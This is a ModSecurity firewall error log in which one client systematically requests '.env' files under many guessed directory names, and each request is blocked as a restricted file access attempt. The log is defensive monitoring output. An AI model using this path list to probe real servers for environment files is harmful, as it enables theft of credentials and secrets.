[Mon May 11 18:07:46.014026 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/redis/.env"] [unique_id "agH-0g-Qm4vhlWBPlMjegAAAAAE"]
[Mon May 11 18:07:46.014346 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0g-Qm4vhlWBPlMjegAAAAAE"]
[Mon May 11 18:07:46.353348 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/elasticsearch/.env"] [unique_id "agH-0g-Qm4vhlWBPlMjeggAAAAE"]
[Mon May 11 18:07:46.353583 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/elasticsearch/.env"] [unique_id "agH-0g-Qm4vhlWBPlMjeggAAAAE"]
[Mon May 11 18:07:46.353904 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0g-Qm4vhlWBPlMjeggAAAAE"]
[Mon May 11 18:07:46.785617 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/rabbitmq/.env"] [unique_id "agH-0g-Qm4vhlWBPlMjegwAAAAE"]
[Mon May 11 18:07:46.785826 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/rabbitmq/.env"] [unique_id "agH-0g-Qm4vhlWBPlMjegwAAAAE"]
[Mon May 11 18:07:46.786090 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0g-Qm4vhlWBPlMjegwAAAAE"]
[Mon May 11 18:07:47.021228 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/kafka/.env"] [unique_id "agH-0w-Qm4vhlWBPlMjehAAAAAE"]
[Mon May 11 18:07:47.021466 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/kafka/.env"] [unique_id "agH-0w-Qm4vhlWBPlMjehAAAAAE"]
[Mon May 11 18:07:47.021761 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0w-Qm4vhlWBPlMjehAAAAAE"]
[Mon May 11 18:07:47.279596 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/queue/.env"] [unique_id "agH-0w-Qm4vhlWBPlMjehgAAAAE"]
[Mon May 11 18:07:47.279829 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/queue/.env"] [unique_id "agH-0w-Qm4vhlWBPlMjehgAAAAE"]
[Mon May 11 18:07:47.280126 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0w-Qm4vhlWBPlMjehgAAAAE"]
[Mon May 11 18:07:47.567647 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/worker/.env"] [unique_id "agH-0w-Qm4vhlWBPlMjehwAAAAE"]
[Mon May 11 18:07:47.567903 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/worker/.env"] [unique_id "agH-0w-Qm4vhlWBPlMjehwAAAAE"]
[Mon May 11 18:07:47.568223 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0w-Qm4vhlWBPlMjehwAAAAE"]
[Mon May 11 18:07:47.821210 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/job/.env"] [unique_id "agH-0w-Qm4vhlWBPlMjeiAAAAAE"]
[Mon May 11 18:07:47.821440 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/job/.env"] [unique_id "agH-0w-Qm4vhlWBPlMjeiAAAAAE"]
[Mon May 11 18:07:47.821710 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-0w-Qm4vhlWBPlMjeiAAAAAE"]
[Mon May 11 18:07:48.122575 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/test/.env"] [unique_id "agH-1A-Qm4vhlWBPlMjeiQAAAAE"]
[Mon May 11 18:07:48.122808 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/test/.env"] [unique_id "agH-1A-Qm4vhlWBPlMjeiQAAAAE"]
[Mon May 11 18:07:48.123104 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-1A-Qm4vhlWBPlMjeiQAAAAE"]
[Mon May 11 18:07:48.419839 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/qa/.env"] [unique_id "agH-1A-Qm4vhlWBPlMjeigAAAAE"]
[Mon May 11 18:07:48.420073 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/qa/.env"] [unique_id "agH-1A-Qm4vhlWBPlMjeigAAAAE"]
[Mon May 11 18:07:48.420384 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-1A-Qm4vhlWBPlMjeigAAAAE"]
[Mon May 11 18:07:48.675387 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/preview/.env"] [unique_id "agH-1A-Qm4vhlWBPlMjeiwAAAAE"]
[Mon May 11 18:07:48.675632 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/preview/.env"] [unique_id "agH-1A-Qm4vhlWBPlMjeiwAAAAE"]
[Mon May 11 18:07:48.675929 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-1A-Qm4vhlWBPlMjeiwAAAAE"]
[Mon May 11 18:07:48.929480 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/beta/.env"] [unique_id "agH-1A-Qm4vhlWBPlMjejAAAAAE"]
[Mon May 11 18:07:48.929723 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/beta/.env"] [unique_id "agH-1A-Qm4vhlWBPlMjejAAAAAE"]
[Mon May 11 18:07:48.930074 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-1A-Qm4vhlWBPlMjejAAAAAE"]
[Mon May 11 18:07:49.181743 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/uat/.env"] [unique_id "agH-1Q-Qm4vhlWBPlMjejgAAAAE"]
[Mon May 11 18:07:49.181999 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/uat/.env"] [unique_id "agH-1Q-Qm4vhlWBPlMjejgAAAAE"]
[Mon May 11 18:07:49.182308 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-1Q-Qm4vhlWBPlMjejgAAAAE"]
[Mon May 11 18:07:49.508500 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/stage/.env"] [unique_id "agH-1Q-Qm4vhlWBPlMjejwAAAAE"]
[Mon May 11 18:07:49.508772 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/stage/.env"] [unique_id "agH-1Q-Qm4vhlWBPlMjejwAAAAE"]
[Mon May 11 18:07:49.509082 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-1Q-Qm4vhlWBPlMjejwAAAAE"]
[Mon May 11 18:07:49.758692 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/development/.env"] [unique_id "agH-1Q-Qm4vhlWBPlMjekAAAAAE"]
[Mon May 11 18:07:49.758924 2026] [security2:error] [pid 1411099:tid 1411102] [client 18.179.223.6:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/development/.env"] [unique_id "agH-1Q-Qm4vhlWBPlMjekAAAAAE"]
